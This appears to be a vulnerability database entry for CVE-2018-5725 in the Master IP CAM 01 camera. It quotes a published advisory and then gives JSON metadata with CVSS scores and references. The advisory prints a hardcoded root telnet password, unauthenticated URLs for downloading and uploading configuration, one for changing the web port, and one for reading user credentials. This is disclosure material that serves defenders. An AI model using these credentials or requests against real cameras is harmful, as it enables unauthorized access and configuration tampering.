VAR-201801-1648
Vulnerability from variot - Updated: 2023-12-18 12:44MASTER IPCAMERA01 3.3.4.2103 devices allow Unauthenticated Configuration Change, as demonstrated by the port number of the web server. MASTER IPCAMERA01 The device contains an access control vulnerability.Information may be tampered with. MASTERIPCAMERA01 is an IP network camera product. A configuration error vulnerability exists in the MASTERIPCAMERA013.3.4.2103 release. An attacker could exploit this vulnerability to change the configuration. # Exploit Title: Master IP CAM 01 Multiple Vulnerabilities
Date: 17-01-2018
Remote: Yes
Exploit Authors: Daniele Linguaglossa, Raffaele Sabato
Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89
Vendor: Master IP CAM
Version: 3.3.4.2103
CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726
I DESCRIPTION
The Master IP CAM 01 suffers of multiple vulnerabilities:
[CVE-2018-5723] Hardcoded Password for Root Account
[CVE-2018-5724] Unauthenticated Configuration Download and Upload
[CVE-2018-5725] Unauthenticated Configuration Change
[CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
II PROOF OF CONCEPT
[CVE-2018-5723] Hardcoded Password for Root Account
Is possible to access telnet with the hardcoded credential root:cat1029
[CVE-2018-5724] Unauthenticated Configuration Download and Upload
Download:
http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi
Upload Form:
Unauthenticated Configuration Upload
[CVE-2018-5725] Unauthenticated Configuration Change
Change configuration:
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080
List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
[CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
Retrieve sensitive information:
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser
III REFERENCES
http://syrion.me/blog/master-ipcam/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726 http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-1648",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "master ip camera01",
"scope": "eq",
"trust": 1.6,
"vendor": "barni",
"version": "3.3.4.2103"
},
{
"model": "master ipcamera01",
"scope": "eq",
"trust": 0.8,
"vendor": "barni carlo",
"version": "3.3.4.2103"
},
{
"model": "ipcamera01",
"scope": "eq",
"trust": 0.6,
"vendor": "master",
"version": "3.3.4.2103"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:barni:master_ip_camera01_firmware:3.3.4.2103:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:barni:master_ip_camera01:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5725"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniele Linguaglossa, Raffaele Sabato",
"sources": [
{
"db": "PACKETSTORM",
"id": "145935"
}
],
"trust": 0.1
},
"cve": "CVE-2018-5725",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-5725",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-02193",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-135757",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-5725",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-5725",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-02193",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201801-570",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-135757",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-5725",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MASTER IPCAMERA01 3.3.4.2103 devices allow Unauthenticated Configuration Change, as demonstrated by the port number of the web server. MASTER IPCAMERA01 The device contains an access control vulnerability.Information may be tampered with. MASTERIPCAMERA01 is an IP network camera product. A configuration error vulnerability exists in the MASTERIPCAMERA013.3.4.2103 release. An attacker could exploit this vulnerability to change the configuration. # Exploit Title: Master IP CAM 01 Multiple Vulnerabilities\n# Date: 17-01-2018\n# Remote: Yes\n# Exploit Authors: Daniele Linguaglossa, Raffaele Sabato\n# Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89\n# Vendor: Master IP CAM\n# Version: 3.3.4.2103\n# CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726\n \nI DESCRIPTION\n========================================================================\nThe Master IP CAM 01 suffers of multiple vulnerabilities:\n \n# [CVE-2018-5723] Hardcoded Password for Root Account\n# [CVE-2018-5724] Unauthenticated Configuration Download and Upload\n# [CVE-2018-5725] Unauthenticated Configuration Change\n# [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure\n \n \nII PROOF OF CONCEPT\n========================================================================\n \n## [CVE-2018-5723] Hardcoded Password for Root Account\n \nIs possible to access telnet with the hardcoded credential root:cat1029\n \n \n## [CVE-2018-5724] Unauthenticated Configuration Download and Upload\n \nDownload:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/backup.cgi\n \nUpload Form:\n \n### Unauthenticated Configuration Upload\n\u003cform name=\"form6\" method=\"post\" enctype=\"multipart/form-data\"\naction=\"cgi-bin/hi3510/restore.cgi\" \u003e\n\u003cinput type=\"file\" name=\"setting_file\" \u003e\n\u003cinput type=\"submit\" value=\"restore\" \u003e\n\u003c/form\u003e\n \n \n## [CVE-2018-5725] Unauthenticated Configuration Change\n \nChange configuration:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport\u0026-httport=8080\n \nList of available commands here:\nhttp://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf\n \n \n## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure\n \nRetrieve sensitive information:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser\n \n \nIII REFERENCES\n========================================================================\nhttp://syrion.me/blog/master-ipcam/\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726\nhttp://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5725"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"db": "PACKETSTORM",
"id": "145935"
}
],
"trust": 2.43
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-135757",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43693",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-5725",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "145935",
"trust": 1.9
},
{
"db": "EXPLOIT-DB",
"id": "43693",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-02193",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-135757",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-5725",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "PACKETSTORM",
"id": "145935"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
]
},
"id": "VAR-201801-1648",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
}
]
},
"last_update_date": "2023-12-18T12:44:12.523000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.barni.it/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.1
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://syrion.me/blog/master-ipcam/"
},
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/43693/"
},
{
"trust": 1.8,
"url": "https://packetstormsecurity.com/files/145935/master-ip-cam-01-hardcoded-password-unauthenticated-access.html"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5725"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5725"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5726"
},
{
"trust": 0.1,
"url": "http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5726"
},
{
"trust": 0.1,
"url": "https://twitter.com/syrion89"
},
{
"trust": 0.1,
"url": "http://www.themadhermit.net/wp-content/uploads/2013/03/fi9821w-cgi-commands.pdf"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5723"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5724"
},
{
"trust": 0.1,
"url": "http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport\u0026-httport=8080"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5724"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5723"
},
{
"trust": 0.1,
"url": "https://twitter.com/dzonerzy,"
},
{
"trust": 0.1,
"url": "http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "PACKETSTORM",
"id": "145935"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "PACKETSTORM",
"id": "145935"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"date": "2018-01-16T00:00:00",
"db": "VULHUB",
"id": "VHN-135757"
},
{
"date": "2018-01-16T00:00:00",
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"date": "2018-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"date": "2018-01-17T03:33:33",
"db": "PACKETSTORM",
"id": "145935"
},
{
"date": "2018-01-16T22:29:00.397000",
"db": "NVD",
"id": "CVE-2018-5725"
},
{
"date": "2018-01-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-135757"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"date": "2018-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-5725"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MASTER IPCAMERA01 Device access control vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…